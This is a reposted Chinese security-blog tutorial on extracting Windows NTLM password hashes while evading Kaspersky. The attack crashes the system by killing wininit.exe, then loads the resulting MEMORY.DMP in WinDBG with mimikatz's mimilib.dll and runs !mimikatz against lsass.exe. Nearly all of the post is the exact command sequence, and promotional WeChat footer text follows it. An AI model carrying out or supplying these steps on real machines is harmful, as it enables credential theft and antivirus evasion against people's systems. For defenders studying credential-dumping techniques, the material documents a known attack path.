通过Windows蓝屏文件来抓密码!

admin 2023年2月28日16:12:51评论76 views字数 995阅读3分19秒阅读模式

文章作者 :Mr.Wu

原文链接 :

https://www.mrwu.red/web/2000.html

需要的工具:WinDBG+mimilib.dll
测试环境一:win8.1
kaspersky2019(病毒库为2018.10.25号的)

通过Windows蓝屏文件来抓密码!1、首先我用procdump来dump lsass.exe的内存文件

通过Windows蓝屏文件来抓密码!2、再用我在https://www.t00ls.net/thread-47663-1-1.html中分享的用sqldump来dump,结局都一样,因为sqldump和procdump的原理都一样
通过Windows蓝屏文件来抓密码!下面我们就用Windows蓝屏memory.dmp文件来测试
3、获取蓝屏后的dmp文件,使系统蓝屏的方法有很多,比如说强制结束系统进程,我这里选择强制结束系统进程wininit.exe
管理员权限运行cmd后,执行taskkill /f /im "wininit.exe"

通过Windows蓝屏文件来抓密码!4、取回存在于C:Windows文件夹下面的MEMORY.DMP文件
通过Windows蓝屏文件来抓密码!5、运行windbg,使用Open the crashdump加载MEMORY.DMP

微信搜索公众号:Linux技术迷,回复:linux 领取资料 。

通过Windows蓝屏文件来抓密码!6、加载mimikatz的mimilib.dll
.load C:UsersAdministratorDesktopqqqmimilib.dll注意load 前面那个点别漏掉

通过Windows蓝屏文件来抓密码!7、设置微软符号服务器(这一步在测试中可有可无)
.SymFix
8、重新加载
.Reload
9、查看lsass.exe进程的内存地址
!process 0 0 lsass.exe
10、切换到lsass.exe进程中
.process /r /p fffffa800e069b00

通过Windows蓝屏文件来抓密码!11、运行mimikatz
!mimikatz

=======================
到此装有kaspersky测试机器win8.1的ntml hash 就成功获得

--完--
读到这里说明你喜欢本公众号的文章,欢迎 置顶(标星)本公众号 Linux技术迷,这样就可以第一时间获取推送了~
本公众号 Linux技术迷,后台回复:Linux,领取2T学习资料 !
1. Linux 中 find 命令的 35 个实际例子
2. 运维必备的《网络端口大全》,看这一份就够了
3. Linux 学习指南 (收藏篇)
4. 2万字系统总结,带你实现Linux命令自由
通过Windows蓝屏文件来抓密码!
通过Windows蓝屏文件来抓密码!

原文始发于微信公众号(信安黑客技术):通过Windows蓝屏文件来抓密码!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月28日16:12:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过Windows蓝屏文件来抓密码!https://cn-sec.com/archives/1579747.html

发表评论

匿名网友 填写信息